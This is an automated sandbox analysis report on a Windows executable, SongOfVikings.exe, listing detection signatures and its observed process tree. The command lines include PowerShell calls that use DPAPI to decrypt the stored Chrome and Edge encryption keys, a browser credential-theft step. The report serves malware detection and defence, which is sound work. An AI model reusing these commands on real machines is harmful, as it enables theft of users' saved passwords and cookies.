Windows Analysis Report: SongOfVikings.exe
Overview
General Information
Detection
Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Multi AV Scanner detection for dropped file
Drops large PE files
Tries to harvest and steal browser information (history, passwords, etc)
Contains functionality to read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- SongOfVikings.exe (PID: 7256 cmdline: "C:\Users\user\Desktop\SongOfVikings.exe" MD5: E66FB39C07D4E01D713FBAC743F4CED7)
- SongOfVikings.exe (PID: 7752 cmdline: "C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe" MD5: B70DAA1BF6AF8358653105CA09FD384B)
- cmd.exe (PID: 8128 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- tasklist.exe (PID: 8180 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
- cmd.exe (PID: 1868 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 3104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- tasklist.exe (PID: 7172 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
- cmd.exe (PID: 6664 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 3228 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
- cmd.exe (PID: 7344 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7416 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
- SongOfVikings.exe (PID: 2060 cmdline: "C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\SongOfVikings" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1924 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: B70DAA1BF6AF8358653105CA09FD384B)
- SongOfVikings.exe (PID: 7880 cmdline: "C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\SongOfVikings" --mojo-platform-channel-handle=2440 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: B70DAA1BF6AF8358653105CA09FD384B)
- SongOfVikings.exe (PID: 7320 cmdline: "C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\SongOfVikings" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1904 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: B70DAA1BF6AF8358653105CA09FD384B)
- cleanup
No configs have been found
No yara matches
System Summary
Source: Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements):